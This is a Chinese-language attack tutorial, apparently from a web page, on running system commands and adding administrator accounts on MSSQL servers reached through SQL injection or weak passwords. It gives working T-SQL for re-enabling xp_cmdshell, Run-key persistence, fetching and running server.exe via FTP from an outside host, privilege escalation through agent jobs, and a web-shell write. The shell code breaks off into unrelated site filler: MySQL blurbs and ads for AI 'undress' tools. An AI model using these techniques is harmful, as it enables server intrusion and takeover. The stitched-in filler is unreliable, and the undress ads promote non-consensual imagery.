假设一台主机开了1433端口我们已通过SQL注入或是空弱密码远程连接 能有哪些办法加一个系统管理员用户呢(或是执行系统命令) 1).XP_CMDSHELL 'cmd.exe /c net user aaa bbb /add' 人人都知道的办法,最大的好处是有回显,但是最怕 if exists (select * from dbo.
假设一台主机开了1433端口我们已通过SQL注入或是空弱密码远程连接
能有哪些办法加一个系统管理员用户呢(或是执行系统命令)
1).XP_CMDSHELL 'cmd.exe /c net user aaa bbb /add'
人人都知道的办法,最大的好处是有回显,但是最怕
if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
通过上面的T-SQL语句就可以把这个扩展储存删了
我们一般可以用
2k:
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
SQL97:
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xpsql70.dll'
就还原了.
但是有的人知道sp_addextendedproc也只不过是一个储存过程一样可以删除的
Drop PROCEDURE sp_addextendedproc
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
还原:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
/*
** Create the extended procedure mapping.
*/
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
呀呀写了这么多其实有个最简单的保护办法:
先NET stop mssqlserver,然后把xplog70.dll(SQL97下用xpsql70.dll)删了
再把服务打开就可以了
2)看了上面的你就明白了xp_cmdshell最终是可以被删除的没别的办法了吗?
有写注册表三:
xp_regwrite 'HKEY_LOCAL_MacHINE','SOFTWAREMicrosoftWindowscurrentversionrun', 'czy82','REG_SZ', net user czy bb /add
其实注册表还有好几个地方可以写的比如说注册表中的WEB浏览设置
用写注册表的办法不好的地方是不但没有回显而且不能马上运行实不实用我也不知道了
3)
declare @s int
exec sp_oacreate "wscript.shell",@s out
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo open ASP.7i24.com>c:a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo 123321>>c:a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo 123321>>c:a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo get server.exe>>c:a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo close>>c:a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c ftp -s:c:a.txt"
exec sp_oamethod @s,"run",NULL,"cmd.exe /c server"
对了正如你看到的我们还可以使用sp_oacreate和sp_oamethod在它们的作用下我们可以
调用系统的控件比如说fso,wsh,shell什么的,但是有个问题是并不能象xp_cmdshell那样
马上看到结果真的不能吗看下面的:
declare @s int,@o int ,@f int,@str nvarchar(4000)
/*exec sp_oacreate "wscript.shell",@s out
exec sp_oamethod @s,"run",NULL,"cmd.exe /c net user>c:temp.txt"*/
exec sp_oacreate "scripting.filesystemobject", @o out
exec sp_oamethod @o, "opentextfile", @f out,"c:temp.txt", 1
exec sp_oamethod @f, "readall",@str out
print @str
先执行注解内的然后执行外面的其实原理很简单就是利用>把结果写到一个文件中然后用
fso来读出来!很实用的
4)
use msdb; --这儿不要是master哟
exec sp_add_job @job_name='czy82';
exec sp_add_jobstep @job_name='czy82',@step_name = 'Exec my sql',@subsystem='CMDEXEC',@command='dir c:>c:b.txt';
exec sp_add_jobserver @job_name = 'czy82',@server_name = 'smscomputer';
exec sp_start_job @job_name='czy82';
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql后面的我们就可以
执行tsql语句了.
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
net start SQLSERVERAGENT
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
@enabled = 1,
@description = 'This will give a low privileged user Access to
xp_cmdshell',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresultset N''select ''''exec
master..xp_cmdshell "dir > c:agent-job-results.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
@server_name = '你的SQL的服务器名'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'
不要怀疑上面的代码我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
才让我们可以以public执行xp_cmdshell
5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
在安焦有文章:?vul_id=2968
USE msdb
EXEC sp_add_job @job_name = 'ArbitraryFileCreate',
@enabled = 1,
@description = 'This will create a file called c:sqlafc123.txt',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate',
@step_name = 'SQLA
FC',
@subsystem = 'TSQL',
@command = 'select ''hello, this file was created by the SQL Agent.''',
@output_file_name = 'c:sqlafc123.txt'
EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'ArbitraryFileCreate'
如果subsystem选的是:tsql在生成的文件的头部有如下内容
??揂rbitraryFileCreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
----------------------------------------------
hello, this file was created by the SQL Agent.
(1 ?????)
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
命令的VBs文件到启动目录!
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
关于sp_MScopyscriptfile 看下面的例子
declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command='dir c: > "attackeripsharedir.txt"'
select @scripfile='c:autoexec.bat > nul" | ' + @command + ' | rd "'
exec sp_MScopyscriptfile @scripfile ,''
这两个东东都还在测试试哟
让MSSQL的public用户得到一个本机的web shell:)
sp_makewebtask @outputfile='d:smsa.asp',@charset=gb2312,
--@query='select '''''
--@query='select '''' '
@query='select ''
" method="POST">
,
MySQL: Essential Skills for Beginners to MasterApr 18, 2025 am 12:24 AMMySQL is suitable for beginners to learn database skills. 1. Install MySQL server and client tools. 2. Understand basic SQL queries, such as SELECT. 3. Master data operations: create tables, insert, update, and delete data. 4. Learn advanced skills: subquery and window functions. 5. Debugging and optimization: Check syntax, use indexes, avoid SELECT*, and use LIMIT.
MySQL: Structured Data and Relational DatabasesApr 18, 2025 am 12:22 AMMySQL efficiently manages structured data through table structure and SQL query, and implements inter-table relationships through foreign keys. 1. Define the data format and type when creating a table. 2. Use foreign keys to establish relationships between tables. 3. Improve performance through indexing and query optimization. 4. Regularly backup and monitor databases to ensure data security and performance optimization.
MySQL: Key Features and Capabilities ExplainedApr 18, 2025 am 12:17 AMMySQL is an open source relational database management system that is widely used in Web development. Its key features include: 1. Supports multiple storage engines, such as InnoDB and MyISAM, suitable for different scenarios; 2. Provides master-slave replication functions to facilitate load balancing and data backup; 3. Improve query efficiency through query optimization and index use.
The Purpose of SQL: Interacting with MySQL DatabasesApr 18, 2025 am 12:12 AMSQL is used to interact with MySQL database to realize data addition, deletion, modification, inspection and database design. 1) SQL performs data operations through SELECT, INSERT, UPDATE, DELETE statements; 2) Use CREATE, ALTER, DROP statements for database design and management; 3) Complex queries and data analysis are implemented through SQL to improve business decision-making efficiency.
MySQL for Beginners: Getting Started with Database ManagementApr 18, 2025 am 12:10 AMThe basic operations of MySQL include creating databases, tables, and using SQL to perform CRUD operations on data. 1. Create a database: CREATEDATABASEmy_first_db; 2. Create a table: CREATETABLEbooks(idINTAUTO_INCREMENTPRIMARYKEY, titleVARCHAR(100)NOTNULL, authorVARCHAR(100)NOTNULL, published_yearINT); 3. Insert data: INSERTINTObooks(title, author, published_year)VA
MySQL's Role: Databases in Web ApplicationsApr 17, 2025 am 12:23 AMThe main role of MySQL in web applications is to store and manage data. 1.MySQL efficiently processes user information, product catalogs, transaction records and other data. 2. Through SQL query, developers can extract information from the database to generate dynamic content. 3.MySQL works based on the client-server model to ensure acceptable query speed.
MySQL: Building Your First DatabaseApr 17, 2025 am 12:22 AMThe steps to build a MySQL database include: 1. Create a database and table, 2. Insert data, and 3. Conduct queries. First, use the CREATEDATABASE and CREATETABLE statements to create the database and table, then use the INSERTINTO statement to insert the data, and finally use the SELECT statement to query the data.
MySQL: A Beginner-Friendly Approach to Data StorageApr 17, 2025 am 12:21 AMMySQL is suitable for beginners because it is easy to use and powerful. 1.MySQL is a relational database, and uses SQL for CRUD operations. 2. It is simple to install and requires the root user password to be configured. 3. Use INSERT, UPDATE, DELETE, and SELECT to perform data operations. 4. ORDERBY, WHERE and JOIN can be used for complex queries. 5. Debugging requires checking the syntax and use EXPLAIN to analyze the query. 6. Optimization suggestions include using indexes, choosing the right data type and good programming habits.
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Atom editor mac version download
The most popular open source editor
SecLists
SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.
PhpStorm Mac version
The latest (2018.2.1) professional PHP integrated development tool
SAP NetWeaver Server Adapter for Eclipse
Integrate Eclipse with SAP NetWeaver application server.
Dreamweaver CS6
Visual web development tools
